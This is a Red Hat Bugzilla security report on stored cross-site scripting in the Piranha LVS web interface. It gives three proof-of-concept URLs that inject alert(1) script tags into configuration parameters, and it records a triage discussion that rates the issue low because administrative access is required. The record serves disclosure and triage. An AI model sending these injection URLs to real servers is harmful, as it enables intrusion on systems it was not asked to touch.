Bug 1051551

Summary: piranha: multiple stored XSS issues
Product: [Other] Security Response Reporter: Othman Madjoudj <athmanem>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: bperkins, cluster-maint, jrusnack, rohara, vkrizan
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: Unspecified   
OS: Unspecified   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2015-10-27 21:55:48 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1275699    
Bug Blocks: 1062151    
Attachments:
Description Flags
A screenshot of one of the issues none

Description Othman Madjoudj 2014-01-10 14:52:31 UTC 
Description of the issue:

It seems that Piranha web application does not escape its output and/or user input (hostnames/IPs/etc...) which leads to Cross Site Scripting vulnerabilities, some of them are reflected (low impact) and some are persistent/stored (high impact) in the configuration file '/etc/sysconfig/ha/lvs.cf'


Tested version: 

piranha-0.8.6-4.el6.x86_64

Examples of the vulnerabilities:

1) stored XSS in hostname parameter (virtual_main.php / virtual_edit_virt.php):
NB. port, address and other parameters are also vulnerable

PoC:
----
http://server:3636/secure/virtual_edit_virt.php?hostname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&port=80&protocol=tcp&address=0.0.0.0&vip_nmask=Unused&sorry_server=&fwmark=&device=eth0%3A1&reentry=15&timeout=6&quiesce_server=0&load=none&sched=Weighted+least-connections&persistent=&pmask=Unused&selected_host=1&vev_action=ACCEPT

Result:
The injection in the PoC will appear in the following page:
http://server:3636/secure/virtual_main.php

Relevant part of '/etc/sysconfig/ha/lvs.cf':

[...]
virtual <script>alert(1)</script> {
     active = 0
     address = 0.0.0.0 eth0:1
     port = 80
     send = "GET / HTTP/1.0\r\n\r\n"
     expect = "HTTP"
     use_regex = 0
     load_monitor = none
     scheduler = wlc
     protocol = tcp
     timeout = 6
     reentry = 15
     quiesce_server = 0
}

2) stored XSS in redundant parameter (redundancy.php)
NB. other parameters could also be vulnerable.

PoC:
----
http://server:3636/secure/redundancy.php?redundant=0.0.0.0%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&hb_interval=6&dead_after=18&hb_port=539&syncd_iface=&syncd_id=&redundancy_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
backup = 0.0.0.0><script>alert(1)</script>
[...]


3) stored XSS in PriLVSIP (global_settings.php)
NB. other parameters could also be vulnerable.

PoC:
----
http://192.168.1.100:3636/secure/global_settings.php?PriLVSIP=192.168.1.100%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&primary_private=&tcp_timeout=&tcpfin_timeout=&udp_timeout=&global_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
primary = 192.168.1.100"><script>alert(1)</script>
[...]
Comment 1 Othman Madjoudj 2014-01-10 14:54:32 UTC 
Created attachment 848233 [details]
A screenshot of one of the issues
Comment 2 Tomas Hoger 2014-02-05 20:35:04 UTC 
(In reply to Athmane Madjoudj from comment #0)
> which leads to Cross Site Scripting vulnerabilities, some of them are
> reflected (low impact)

Your report do not seem to specify any reflected XSS, only 3 stored XSS are listed.

> and some are persistent/stored (high impact) in the configuration file
> '/etc/sysconfig/ha/lvs.cf'

That's correct, input from lvs.cf are not encoded properly before being added to the output of the web application.  However, I disagree with the high impact rating.  For the application, lvs.cf is really a trusted input for the application.  Also privileges to edit the file via the web application are administrative privileges, which make this more of a bug than a real security issue.
Comment 6 Othman Madjoudj 2014-02-05 21:43:20 UTC 
(In reply to Tomas Hoger from comment #2)
> (In reply to Athmane Madjoudj from comment #0)
> > which leads to Cross Site Scripting vulnerabilities, some of them are
> > reflected (low impact)
> 
> Your report do not seem to specify any reflected XSS, only 3 stored XSS are
> listed.
> 

I didn't have time to check everything, so I could be wrong about reflected XSS.


> > and some are persistent/stored (high impact) in the configuration file
> > '/etc/sysconfig/ha/lvs.cf'
> 
> That's correct, input from lvs.cf are not encoded properly before being
> added to the output of the web application.  However, I disagree with the
> high impact rating.  For the application, lvs.cf is really a trusted input
> for the application.  Also privileges to edit the file via the web
> application are administrative privileges, which make this more of a bug
> than a real security issue.

True